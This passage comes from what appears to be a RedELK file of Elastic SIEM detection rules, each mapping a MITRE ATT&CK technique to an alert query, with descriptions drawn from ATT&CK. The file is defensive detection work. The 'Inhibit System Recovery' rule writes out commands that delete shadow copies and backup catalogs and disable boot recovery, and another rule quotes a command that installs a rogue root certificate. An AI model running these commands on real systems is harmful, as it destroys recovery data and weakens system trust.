T1070","references":["https://attack.mitre.org/techniques/T1070"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1070","name":"Indicator Removal on Host","id":"T1070"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1066","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1066] Indicator Removal from Tools","query":"threat.technique.id: T1066","references":["https://attack.mitre.org/techniques/T1066","https://attack.mitre.org/techniques/T1027/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1066","name":"Indicator Removal from Tools","id":"T1066"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. [1] [2]\nAdversaries may abuse these features for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1202","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1202] Indirect Command Execution","query":"threat.technique.id: T1202","references":["https://attack.mitre.org/techniques/T1202"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1202","name":"Indirect Command Execution","id":"T1202"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.[1][2] Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of Data Destruction and Data Encrypted for Impact.[1][2]\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\nvssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\nWindows Management Instrumentation can be used to delete volume shadow copies - wmic shadowcopy delete\nwbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\nbcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {{default}} bootstatuspolicy ignoreallfailures & bcdedit /set {{default}} recoveryenabled no","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1490","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1490] Inhibit System Recovery","query":"threat.technique.id: T1490","references":["https://attack.mitre.org/techniques/T1490"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1490","name":"Inhibit System Recovery","id":"T1490"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1056","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1056] Input Capture","query":"threat.technique.id: T1056","references":["https://attack.mitre.org/techniques/T1056"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1056","name":"Input Capture","id":"T1056"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1056","name":"Input Capture","id":"T1056"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: Bypass User Access Control).\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.[1] This type of prompt can be used to collect credentials via various languages such as AppleScript[2][3] and PowerShell[2][4].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1141","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1141] Input Prompt","query":"threat.technique.id: T1141","references":["https://attack.mitre.org/techniques/T1141","https://attack.mitre.org/techniques/T1056/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1141","name":"Input Prompt","id":"T1141"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. [1] Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. [2]\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. [3]\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. [4]\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. [5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1130","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1130] Install Root Certificate","query":"threat.technique.id: T1130","references":["https://attack.mitre.org/techniques/T1130","https://attack.mitre.org/techniques/T1553/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1130","name":"Install Root Certificate","id":"T1130"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.[1]\nAdversaries may leverage Spearphishing Attachment or Spearphishing Link as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through Input Capture on sites that mimic email login interfaces.\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.[1] The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1534","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1534] Internal Spearphishing","query":"threat.technique.id: T1534","references":["https://attack.mitre.org/techniques/T1534"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1534","name":"Internal Spearphishing","id":"T1534"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"InstallUtil","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1118","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1118] InstallUtil","query":"threat.technique.id: T1118","references":["https://attack.mitre.org/techniques/T1118","https://attack.mitre.org/techniques/T1218/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1118","name":"InstallUtil","id":"T1118"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1118","name":"InstallUtil","id":"T1118"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force.[1][2]\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service[3]).[4][5][6][7]\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).[1][2] Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.[2][1] [7]\nThis same attack could be executed using service tickets captured from network traffic.[2]\nCracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.[6]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1208","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1208] Kerberoasting","query":"threat.technique.id: T1208","references":["https://attack.mitre.org/techniques/T1208","https://attack.mitre.org/techniques/T1558/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1208","name":"Kerberoasting","id":"T1208"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. [1]\nWhen used maliciously, LKMs can be a type of kernel-mode Rootkit that run with the highest operating system privilege (Ring 0). [2] Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. [3]\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. [4] [5] [6] [7][8] [9][10] [11]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1215","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1215] Kernel Modules and Extensions","query":"threat.technique.id: T1215","references":["https://attack.mitre.org/techniques/T1215","https://attack.mitre.org/techniques/T1547/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1215","name":"Kernel Modules and Extensions","id":"T1215"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. [1] The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. [2] By default, the passphrase for the keychain is the user’s logon credentials.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1142","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1142] Keychain","query":"threat.technique.id: T1142","references":["https://attack.mitre.org/techniques/T1142","https://attack.mitre.org/techniques/T1555/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1142","name":"Keychain","id":"T1142"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"LC_MAIN Hijacking","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1149","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1149] LC_MAIN Hijacking","query":"threat.technique.id: T1149","references":["https://attack.mitre.org/techniques/T1149"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1149","name":"LC_MAIN Hijacking","id":"T1149"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. [1] There are tools available to perform these changes.\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1161","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1161] LC_LOAD_DYLIB Addition","query":"threat.technique.id: T1161","references":["https://attack.mitre.org/techniques/T1161","https://attack.mitre.org/techniques/T1546/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1161","name":"LC_LOAD_DYLIB Addition","id":"T1161"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. [1] [2]\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. [3][4]\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder. [5] [6] [7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1171","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1171] LLMNR/NBT-NS Poisoning and Relay","query":"threat.technique.id: T1171","references":["https://attack.mitre.org/techniques/T1171","https://attack.mitre.org/techniques/T1557/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1171","name":"LLMNR/NBT-NS Poisoning and Relay","id":"T1171"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. [1]\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., Hijack Execution Flow), an adversary can use LSA operations to continuously execute malicious payloads.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1177","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1177] LSASS Driver","query":"threat.technique.id: T1177","references":["https://attack.mitre.org/techniques/T1177","https://attack.mitre.org/techniques/T1547/008"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1177","name":"LSASS Driver","id":"T1177"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1177","name":"LSASS Driver","id":"T1177"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in /System/Library/LaunchAgents, /Library/LaunchAgents, and $HOME/Library/LaunchAgents [1] [2] [3]. These launch agents have property list files which point to the executables that will be launched [4].\nAdversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories [5] [6]. The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in [7] [8]. They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1159","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1159] Launch Agent","query":"threat.technique.id: T1159","references":["https://attack.mitre.org/techniques/T1159","https://attack.mitre.org/techniques/T1543/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1159","name":"Launch Agent","id":"T1159"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons [1]. These LaunchDaemons have property list files which point to the executables that will be launched [2].\nAdversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories [3]. The daemon name may be disguised by using a name from a related operating system or benign software [4]. Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.\nThe plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1160","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1160] Launch Daemon","query":"threat.technique.id: T1160","references":["https://attack.mitre.org/techniques/T1160","https://attack.mitre.org/techniques/T1543/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1160","name":"Launch Daemon","id":"T1160"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1160","name":"Launch Daemon","id":"T1160"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Launchctl","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1152","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1152] Launchctl","query":"threat.technique.id: T1152","references":["https://attack.mitre.org/techniques/T1152","https://attack.mitre.org/techniques/T1569/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1152","name":"Launchctl","id":"T1152"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1152","name":"Launchctl","id":"T1152"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1152","name":"Launchctl","id":"T1152"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.[1]\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1168","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1168] Local Job Scheduling","query":"threat.technique.id: T1168","references":["https://attack.mitre.org/techniques/T1168","https://attack.mitre.org/techniques/T1053"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1168","name":"Local Job Scheduling","id":"T1168"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1168","name":"Local Job Scheduling","id":"T1168"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1037","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1037] Logon Scripts","query":"threat.technique.id: T1037","references":["https://attack.mitre.org/techniques/T1037"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1037","name":"Logon Scripts","id":"T1037"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}},{"framework":"MITRE 